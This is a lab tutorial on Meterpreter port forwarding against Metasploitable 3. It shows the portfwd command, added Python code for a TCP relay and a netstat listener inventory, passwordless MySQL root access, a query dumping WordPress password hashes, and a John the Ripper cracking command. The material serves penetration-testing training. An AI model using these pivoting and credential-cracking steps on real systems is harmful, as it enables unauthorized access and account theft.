Metasploitable 3: Meterpreter Port forwarding

By Hacking Tutorials on October 16, 2017 Metasploit Tutorials

In this Metasploitable 3 Meterpreter port forwarding tutorial we will learn how to forward local ports that cannot be accessed remotely. It is very common and good practice to run specific services on a local machine and make them available to that local machine only, instead of to the full network. On a local network these services are typically administration panels used to configure hardware or software on a single machine, which has no need to expose them to the full network, just like you would not want to expose a local FTP or SMB server to the internet. A good example of a service that doesn’t allow external access by default is MySQL server: it disables remote access upon installation for security reasons and requires the system administrator to explicitly enable it before remote connections are allowed. In this tutorial we will be using Meterpreter’s port forwarding to tunnel connections to services that cannot be accessed remotely.

To follow this Port forwarding tutorial we assume that you’ve properly installed the Metasploitable 3 machine and have shell access to it. If not, please follow these tutorials first:

  • How to setup Metasploitable 3 on Windows 10
  • Metasploitable 3: Exploiting ManageEngine Desktop Central 9
  • Metasploitable 3: Exploiting HTTP PUT

Port forwarding is the process of forwarding a local port on your system to the remote port you want to access. In this tutorial we will be focusing on port forwarding local ports that cannot be accessed remotely.

Port forwarding: Accessing local ports remotely

The starting point of this tutorial is where the last tutorial ended: a Meterpreter shell that was gained by exploiting HTTP PUT, which allowed us to upload malicious files to the web root directory.

The starting point of this tutorial is a Meterpreter shell.

When we run ipconfig on the Metasploitable 3 machine we can see there’s a second NIC present with IP 10.0.2.15, as shown in the following screenshot.

Multiple NICs on Metasploitable 3.

The only problem is that this network is currently not routable from our Kali Linux attack machine. To access this network we would have to set up a SOCKS4 proxy with proxychains to forward all connections to this subnet. The same technique would also allow us to scan the target network from the perspective of the Metasploitable 3 machine. This would reveal open ports and services that can be accessed locally but not remotely. One example of such a service is the MySQL service running on port 3306. The initial Nmap scans didn’t reveal this port because it is firewalled, as it’s not meant to be accessed remotely. When we run netstat on the Metasploitable 3 machine we can verify that port 3306 is in use on the machine and that the service with PID 2224 is attached to it:

Netstat output on Metasploitable 3.

By running tasklist we can verify that MySQL.exe is running on PID 2224:

PID for MySQL.
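
The netstat and tasklist steps above are exactly the inventory a defender should keep of a host: which ports are listening, on which addresses, and which process owns them. The following is an added example, not part of the original tutorial, that does that join automatically: it parses the text output of Windows `netstat -ano` and `tasklist`, maps each TCP listener to its process by PID, and lists the listeners that an external port scan would not have shown. The sample output embedded in it is constructed for this example (it reuses the tutorial’s port 3306 and PID 2224; the other entries are invented), and the function names are my own.

```python
import re

# Constructed sample of `netstat -ano` output on a Windows host (not the
# tutorial's screenshot): the MySQL listener on 3306 owned by PID 2224, a
# loopback-only admin listener, an established connection and a UDP socket.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       2224
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       1904
  TCP    172.28.128.3:49170     172.28.128.1:4444      ESTABLISHED     3012
  UDP    0.0.0.0:123            *:*                                    1032
"""

# Constructed sample of `tasklist` output on the same host.
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        312 K
svchost.exe                   1032 Services                   0      9,812 K
java.exe                      1904 Services                   0    201,340 K
MySQL.exe                     2224 Services                   0     45,120 K
w3wp.exe                      3012 Services                   0     38,004 K
"""

# A TCP listener line: local address:port, any foreign address, LISTENING, PID.
_TCP_LISTEN = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
# A tasklist data line: image name (may contain spaces), PID, session, id, memory.
_TASK_LINE = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output (header lines do not match)."""
    pids = {}
    for line in text.splitlines():
        m = _TASK_LINE.match(line)
        if m:
            pids[int(m.group(2))] = m.group(1).strip()
    return pids


def bind_scope(addr):
    """Describe who can reach a socket at the IP level, based on its bind address."""
    if addr in ("0.0.0.0", "[::]"):
        return "all interfaces"
    if addr.startswith("127.") or addr == "[::1]":
        return "loopback only"
    return "interface " + addr


def listening_services(netstat_text, tasklist_text):
    """Join TCP listeners from `netstat -ano` with process names from `tasklist`.

    Returns a list of (port, bind_scope, pid, image) tuples sorted by port.
    """
    pids = parse_tasklist(tasklist_text)
    found = []
    for line in netstat_text.splitlines():
        m = _TCP_LISTEN.match(line)
        if m:
            addr, port, pid = m.group(1), int(m.group(2)), int(m.group(3))
            found.append((port, bind_scope(addr), pid, pids.get(pid, "unknown")))
    return sorted(found)


def hidden_from_network(listeners, externally_visible_ports):
    """Listeners present on the host but absent from an external port scan.

    A listener on all interfaces that an outside scan does not show is being
    filtered by a host firewall (the situation described for MySQL above); a
    loopback-only listener is unreachable from the network by design. Either
    way the service is reachable from the host itself, so it still needs
    proper authentication.
    """
    visible = set(externally_visible_ports)
    return [entry for entry in listeners if entry[0] not in visible]


if __name__ == "__main__":
    services = listening_services(NETSTAT_SAMPLE, TASKLIST_SAMPLE)
    for port, scope, pid, image in services:
        print(f"{port:>5}/tcp  {scope:<16}  pid {pid:<5}  {image}")
    # Suppose the external Nmap scan only showed port 80 open.
    for port, scope, pid, image in hidden_from_network(services, [80]):
        print(f"not visible from the network: {port}/tcp ({image}, {scope})")
```

Run against real output, the two samples are simply replaced by the captured text of `netstat -ano` and `tasklist` from the host; the point of the last function is that every entry it returns is a service whose only protection from the network is a bind address or a firewall rule, which is exactly the protection the rest of this tutorial shows being bypassed.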

Now that we know MySQL is running on port 3306 and cannot be accessed remotely, we need to set up the Meterpreter shell in a way that lets us tunnel connections over it. Since the Meterpreter shell runs on the target itself and is able to access port 3306, we need to forward a local port on our attack machine to the Metasploitable 3 machine over the Meterpreter session. The easiest way to do this is with the Meterpreter portfwd command. Before we forward the local port to Metasploitable 3, let’s have a look at the port forwarding functionality in general to get a better understanding of what it exactly does.

Meterpreter port forwarding

The port forwarding functionality in Meterpreter can be used as a pivoting technique to reach networks and machines that are otherwise inaccessible, by going through the compromised machine. The portfwd command relays TCP connections to and from the connected machine. In the following steps we’ll make the MySQL server port 3306 available on the local attack machine and forward the traffic on that port to Metasploitable 3. When everything is set up, we will connect to localhost on port 3306 with the mysql command line client, and the connection to this port will be forwarded to Metasploitable 3.

We can create the tunnel using the following command in the Meterpreter session:

portfwd add -l 3306 -p 3306 -r 172.28.128.3

Let’s explain the parameters we’ve used in the command:

  • -l [port] is the local port that will be listening and forwarded to our target. This can be any port on your machine, as long as it’s not already in use by another service.
  • -p [port] is the destination port on our target host.
  • -r [target host] is the targeted system’s IP or hostname.
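
To make concrete what the portfwd command does with these three parameters, here is an added example of the same kind of relay written in Python. It is not the tutorial’s code and not Meterpreter’s: it listens on a local port and, for every accepted connection, opens a connection to the target host and port and copies bytes in both directions. The class name PortForward, the roundtrip helper and the echo server are my own; the echo server bound to 127.0.0.1 stands in for the “local only” service on the pivot host, and using local port 0 just asks the OS for any free port (the same role as -l in the tutorial).

```python
import contextlib
import socket
import threading

BUFSIZE = 4096


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then pass the EOF on to dst."""
    with contextlib.suppress(OSError):
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            dst.sendall(data)
    with contextlib.suppress(OSError):
        dst.shutdown(socket.SHUT_WR)


class PortForward:
    """Relay doing what `portfwd add -l <local_port> -p <remote_port> -r <remote_host>` does:
    each connection accepted on local_port is paired with a fresh connection to
    remote_host:remote_port and bytes are copied both ways until both sides close."""

    def __init__(self, local_port, remote_host, remote_port, bind_addr="127.0.0.1"):
        self.remote = (remote_host, remote_port)
        self._stop = threading.Event()
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, local_port))
        self.listener.listen(8)
        self.listener.settimeout(0.2)  # lets the accept loop notice stop()
        self.local_port = self.listener.getsockname()[1]  # real port when 0 was requested
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)
        self._thread.start()

    def _accept_loop(self):
        while not self._stop.is_set():
            try:
                client, _ = self.listener.accept()
            except socket.timeout:
                continue
            client.settimeout(None)
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()
        self.listener.close()

    def _relay(self, client):
        try:
            remote = socket.create_connection(self.remote, timeout=5)
        except OSError:
            client.close()  # target port unreachable: drop the local side as well
            return
        remote.settimeout(None)
        back = threading.Thread(target=_pump, args=(remote, client), daemon=True)
        back.start()           # target -> local
        _pump(client, remote)  # local -> target
        back.join()
        client.close()
        remote.close()

    def stop(self):
        self._stop.set()
        self._thread.join()


def start_echo_server():
    """Constructed stand-in for the 'local only' service on the pivot host: bound to
    loopback, it echoes each connection's bytes back. Returns the listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener closed
                return
            with conn:
                _pump(conn, conn)  # read from conn, write the same bytes back to conn

    threading.Thread(target=serve, daemon=True).start()
    return srv


def roundtrip(payload):
    """Send payload through a PortForward to the echo service and return the reply.
    Local port 0 means 'any free port', the same role as -l in the tutorial."""
    echo = start_echo_server()
    fwd = PortForward(0, "127.0.0.1", echo.getsockname()[1])
    try:
        with socket.create_connection(("127.0.0.1", fwd.local_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; read until the relay passes EOF back
            return b"".join(iter(lambda: c.recv(BUFSIZE), b""))
    finally:
        fwd.stop()
        echo.close()


if __name__ == "__main__":
    print(roundtrip(b"hello through the forward"))
```

The relay never inspects the bytes it copies, which is why any TCP service works through it, and the `_relay` method shows the only decision it makes: if the target port refuses the connection, the local side is closed too, so a client sees an immediate disconnect rather than a hang. From the defender’s side the lesson is the same one the rest of the tutorial makes: a bind address or a host firewall decides where packets may enter, but once code runs on the host, a relay like this one makes a loopback-bound service reachable from wherever the relay listens, so the service still needs its own authentication.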

When we’ve successfully run the command in the Meterpreter session, the output stating that the port has been forwarded should look as follows:

Forwarding local port 3306 to port 3306 on 172.28.128.3

We can verify that local port 3306 is now open on our attack machine by running netstat as follows:

Port 3306 available on the local attack box.

Next, we can access the MySQL service on Metasploitable 3 by pointing the MySQL client at the forwarded port on localhost. The -h option matters here: the mysql client only connects over TCP when a host is given, and without it the address would be taken as a database name while the client tried the local Unix socket instead:

mysql -u root -h 127.0.0.1

Successful connection to the MySQL server.

Connecting to the MySQL server also revealed a commonly seen security issue: we did not supply a password in the connection command, and we were not prompted for one either. As we can see in the screenshot, we are able to list all databases present on the MySQL server, including the WordPress database. Just because a service can only be accessed locally, it doesn’t mean that a password protection layer becomes obsolete: as we can see, connections and ports can easily be forwarded once an attacker has shell access to the machine.

Now that we have access to the WordPress database, we might as well extract the user password hashes using the following SQL query:

select user_login, user_pass from wp_users;

WordPress password hashes

Running a dictionary attack with John the Ripper on the admin hash, saved to a file named wpaccounts, reveals the password for the WordPress admin user:

john --wordlist=/usr/share/wordlists/rockyou.txt wpaccounts

The password for the admin account is sploit.

Hopefully this tutorial was helpful and you were able to set up the forward successfully in the Meterpreter session. In this tutorial we’ve learned about port forwarding with Meterpreter. We’ve forwarded connections from a local port on our attack box, over Meterpreter, to a local port on the Metasploitable 3 machine. This allowed us to access port 3306 on Metasploitable 3 from a remote machine. In the next and last Metasploitable 3 hacking tutorial we will be attacking the WordPress installation using a few different attack vectors.
